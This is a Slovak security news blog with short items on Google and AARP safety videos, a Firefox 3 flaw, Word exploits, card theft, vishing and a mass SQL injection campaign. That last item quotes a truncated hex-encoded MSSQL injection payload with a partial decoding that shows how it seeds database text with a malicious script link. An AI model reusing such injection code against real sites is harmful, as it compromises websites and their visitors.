Bezpečnostné tipy od spoločností Google a AARP

Čoraz viac a viac sa starší Američania prihlasujú na internet, aby mohli zostať v kontakte so svojou rodinou a priateľmy, surfovať po webových stránkach a blogoch, zdielať fotky, prehliadať si videá alebo spustiť internetový biznis. Tak isto ako všetci užívatelia internetu, aj oni môžu naraziť na nebezpečnú činnosť v podobe rôznych vírusov alebo malwarov.
Práve preto spoločnosť Google v spolupráci s AARP zahájily nové video série, ktoré poskytujú ľahko pochopiteľné rady a tipy ako zostať pri práci s internetom v relatívnom bezpečí. Zahrňuje napríklad odkazy na nastavenie súkromia albumov s fotkami, ktoré sa zdielajú online, konfigurácia firewallu pre ochranu svojho počítača, voľba bezpečných hesiel pre svoje online účty alebo vyhnutie sa podvodom typu phising. Ak rozumiete po anglicky, môžete si prehliadnuť videá na serveri YouTube (The Google Privacy Channel) ako aj na stránkach spoločnosti AARP.
Tu sa môžete pozrieť na prvé video:

Dúfajme, že sa pomocou rád z týchto videí aspoň trochu zvýší povedomie, aká je v dnešnej dobe bezpečnosť na internete dôležitá. Aj keď môj názor je, že to pravdepodobne neosloví ľudí dostatočne na to, aby celkovo bezpečnosť nebrali na ľahkú váhu.

Zdroje: googleblog & webpronews

Google za lepší svet

Internetový gigant Google najnovšie vytvoril na svoje desiate narodeniny projekt s názvom "Projekt 10¹⁰⁰" . Celý projekt je súťaž, ktorej výherca získa cenu pomocou ktorej pomôže ľuďom z celého sveta. "Hľadáme nápady, ktoré pomôžu čo najväčšiemu počtu ľudí akýmkoľvek spôsobom, aby sme ich my potom mohli financovať." vyhlásila spoločnosť Google.
Ak teda máte originálny alebo unikátny nápad, o ktorom si myslíte, že by mohol nejakým spôsobom pomôct ľuďom, môžte tak učiniť poslaním svojej myšlienky. Google potom vyberie 100 najlepsích nápadov, z pomedzi ktorých verejnosť určí 20 projektov, ktoré postúpia do semi-finálového kola, následovne sa oreže počet až na 5 najlepších projektov, ktoré si podľa všetkého rozdelia 10 miliónov dolárov na ich činnosť.
Určite pekná myšlienka od tejto korporácie, uvidíme aký to bude mať vývoj, v každom prípade som rád, že sa nájdu spoločnosti, ktoré chcú investovať do budúcnosti našej zeme. Na záver ešte pekné video k projektu:

Zdroj: webpronews.com

Radware odhalil kritickú zraniteľnosť v prehliadači Firefox 3

Objav výskumného týmu Radware SOC (Security Operations Center) poukazuje na zraniteľnosť, ktorá by mohla viesť k spadnutiu systému prehliadača Firefox a následovnej strate akýchkoľvek neuložených informácií. Bezprostrednou ochranou pred touto zraniteľnosťou je Radwarov Security Update Service (SUS), ktorý sa snaží chrániť zákazníkov infraštruktúry v predstihu na odhalené závady.

"Oceňujeme, že Mozilla naďalej výrazne investuje do bezpečnostných vlastností Firefoxu 3, avšak boli sme schopní veľmi ľahko odhaliť túto zraniteľnosť prostredníctvom jednoduchej fuzzing technike." uviedol Itzik Kotler, riaditeľ SOC, Radware. "Toto jasne ukazuje na to, že tvz. "zero-minute" zraniteľnosti môžu byť stále agresívnejšie voči verejným doménam, takže je čoraz viac zrejmé, že bezpečnostné požiadavky musia zostať na poprednom mieste pri tvorbe a uvoľňovaní nových sieťových aplikácií."

Radware takiež určil, že chyba postihuje verziu 3.0 rovnako ako jej menšie aktulizácie (3.0.1)

Pre viac informácií prosím navštívte domovskú stránku Radware.

Microsoft varuje na nové Word útoky

Microsoft vydal dalšie z bezpečnostných prehlásení týkajúce sa útokov zameraných na aplikáciu Word.Spoločnosť v prehlásení uviedla, že obdržala správy útočníkov zameriavajúcich sa na chyby v .doc súboroch. Predpokladá sa, že tieto útoky v súčasnej dobe niesu veľmi rozšírené.

Útočník by mohol použiť špecálne vytvorený dokument, ktorý spôsobý chybu pretečenia pamäte a následný pád aplikácie. Táto chyba by potom zanechala systém zraniteľným a útočníkovi umožňovala vzdialene spustit nebezpečný kód.

Spoločnosť Microsoft tiež uviedla, že zraniteľnosť sa vyskytuje iba v spojení Word 2002 a Sercice Pack 3. Žiadna iná verzia aplikácie MS Word alebo sady Office by nemala byť náchylná k spomínanému útoku. Spoločnosť taktiež doporučuje okrem inštalácie základných bezpečnostných programov ako napríklad brána firewall alebo antivírusový softvér zvýšiť aj ostražitosť pri otváraní mailov s podozrivými .doc súbormi.

Tento týžden je to už podruhé, čo Microsoft vypustill opravný balík pre chybu, ktorá je aktívne využívaná. V pondelok spoločnosť vydala varovanie o vzdialene spúšťajúcom kóde, ktorý sa upriamuje na prvok ActiveX v Office Acces software.

Zdroj: securecomputing.net

Na obzore čoraz viac zákerných útokov

Informačné bezpečnostné fórum (ISF) začalo varovať pred zvýšeným nárastom škodlivých hrozieb vrátane útokov z organizovanej trestnej činnosti, priemyselnej špionáži spolu s rastom mobilného malwaru a Web 2.0 zraniteľnosťami. Toto sú len niektoré z prognóz v oblasti informačnej bezpečnosti, ktoré sa budú s najväčšou pravdepodobnosťou v priebehu nasledujúcich rokov stupňovať. Správa označovaná ako Threat Horizon 2010, teda vo voľnom preklade niečo ako výstražný horizont vychádza z praktických skúseností a znalostí členov ISF, zahrňujúcich približne 300 najväčších svetových podnikov a organizácií verejného sektoru.

Andy Jones, hlavný výskumný poradca pre ISF a autor tohoto komentáru: "Zločinecké skupiny v súčasnej dobe vidia online trestnú činnosť ako málo riskantnú a lukratívnu k okrádaniu bánk. S problematikov ochrany veľkého množstva citlivých informácií držaných organizáciami v elektronickej podobe sú tieto podniky tiež pod neustále rastúcou hrozbou špionáže alebo cielenej strate konkurenčných výhod."

Ďalšou rizikovou oblasťou podľa ISF sú sociálne siete, teda stránky ako napríklad Bebo alebo Facebook, ktoré sa stali obľúbenou a populárnou súčasťou mnohých kancelárií. ISF si totiž myslí, že kybernetický kriminálnici si prispôsobia metódy útokov na zraniteľný cieľ , ktorý v tomto prípade môže byť jedna zo stránok sociálnych sietí.

A na záver, ISF správa upozorňuje na riziká v podaní novej techno-generačnej firemnej kultúry poháňanej poväčšine mladšími luďmi. Ohrozený horizont 2010 je jednou z viac než 200 autoritatívnych správ spolu s informačným rizikom a analytických nástrojov, ktoré sú k dispozícií zdarma pre ISF členov.

Viac na net-security

Traja hackeri obvinený zo sniffovania kreditných kariet

Traja medzinárodní hackery boli údajne obžalovaný z používania počítačových a programátorských znalostí za účelom odcudzenia a predaja čísiel kreditných kariet, ktoré vlastnili zákazníci reštaurácie Dave & Buster's.Toto vyhlásenie v pondelok vydal justičný úrad.
U jedného zo zatknutých mužov (Maksym Yastremskiy z Ukrajiny) boli nájdené milióny čísiel odcudzených kreditných kariet, ktoré sa však nevzťahovali k dotyčnej reštaurácii.
Prípad je posledným v moloobchodnej sieti, v ktorej sa hackery dostali do firemných sietí a zachytávali transakcie prevedené kreditnou kartou v reálnom čase.Podobný útok, ale väčších rozmerov bol vykonaný na sieť predajcov obuvi DSW v roku 2005, kde bolo ohrozených 1,4 milióna zákazníkov.Taktiež dlhá infiltrácia maloobchodného gigantu T.J.Maxx spôsobila, že bolo nechránených prinajmenšom 45 miliónov zákazníkov.

Viac info

Masívny SQL Injection

A je to tu, další v poradí z hromadných SQL Injection útokov, ktorý infikoval tisíce webových stránok.
Výsledok Google vyhľadávania sa pohybuje niekde na hranici 510,000 modifikovaných stránok.


Čím ďalej tým viac webstránok začína používať koncové databázy kôli ich väčšej rýchlosti a dynamike, čo taktiež znamená, že je veľmi rozhodujúce aké data budú uložené do týchto databáz pri vytvorení požiadavky.Obzvlášť vtedy, ak je užívateľovy povolený upload obsahu, ktorý sa môže nachádzať v diskusných fórach, blogoch, atd.
Pokiaľ sa tieto data neošetria ešte pred uložením, nemôžte kontrolovať čo sa bude zobrazovať od užívateľov na stránke.A práve túto slabinu využíva tento typ SQL injekcie.Injekcia kódu vyzerá cca takto (kód nieje úplný):
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…
po dekódovaní:
DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…
Následkom tejto injekcie sa nájdu všetky texty v databáze a vloží sa do nich link, ktorý odkazuje na zákerný javascript.V zásade sa útočníci obzerajú okolo stránok ASP alebo ASPX obsahujúce nejaký querystring (dynamická hodnota ako napríklad ID čláku, produktu, atd.) parameter použitý k uploadu SQL Injection kódu.
src: f-secure

Hacker dostal mastnú pokutu

V estónskom hlavnom meste Tallin bol odsúdený prvý počítačový pirát, ktorý zaútočil na webové stránky štátnych inštitúcií. Dvadsaťročný Estónec ruskej národnosti sa priznal, že vyradil z prevádzky internetovú stránku premiéra Andruse Ansipa. Dostal pokutu v prepočte približne za 30 000 našich korún čo neni tak hrozne ale stálo mu to za to?Ja myslím že nie ■

Nová hrozba s názvom Vishing?

IC3 (Internet Crime Complaint Center, FBI) varuje na rastúce útoky pod názvom vishing. Technológia vishing nabáda obete na komunikáciu za účelom riešenie technických problémov alebo problémov s účtom v ich banke . Ide o podvod, kde zločinecké skupiny zasielajú e-mail alebo textové správy na mobilné telefóny obetiam, ktoré hovoria o vzniknutom bezpečnostnom probléme a žiadajú obeť aby kontaktovala telefonicky priamo ich alebo banku z dôvodu reaktivácie kreditnej alebo debetnej platobnej karty. Po zavolaní na telefónne číslo, ktoré bolo uvedené v správe sa ozve uvítanie banky a následne žiadosť o zadanie čísla karty alebo iných údajov, ktoré útočník potrebuje pre zneužitie pod zámienkou vyriešenia bezpečnostných alebo iných problémov. Tieto útoky zosilneli najmä preto, že v posledných rokoch výrazne zlacnela VoIP technológia a pribudli open source call centrá, ktoré je možné takto zneužívať. Bezpečnostný experti hovoria, že vishing môže byť oveľa efektívnejší ako tradičné phishing technológie, ktoré obete presmerujú na nepravé stránky zväčša bankových inštitúcií najmä z dôvodu, že táto forma útokov nie je ešte tak rozšírená. Pre zabránenie zneužitia prostredníctvom vishingu sa odporúča aby ľudia po prijatí správy alebo telefonického hovoru, kde odosielateľ sa predstavuje ako banka si overili či ich kontaktovala naozaj banka a to tak, že si skontrolujú kontaktné údaje na internete a priamo banku kontaktujú alebo sa dostavia do banky osobne ■

Spustenie webu

Tak a je to tu!Konečne som spustil svoj vlastný web cez stránku blogger

O čom budem písať?

Prevažne o bezpečnosti webových aplikácií, o možných zraniteľnostiach alebo metódach útoku na webovú stránku.Súčasne sa budem snažiť držať temto s dobou a vydávať aktuálne novinky ■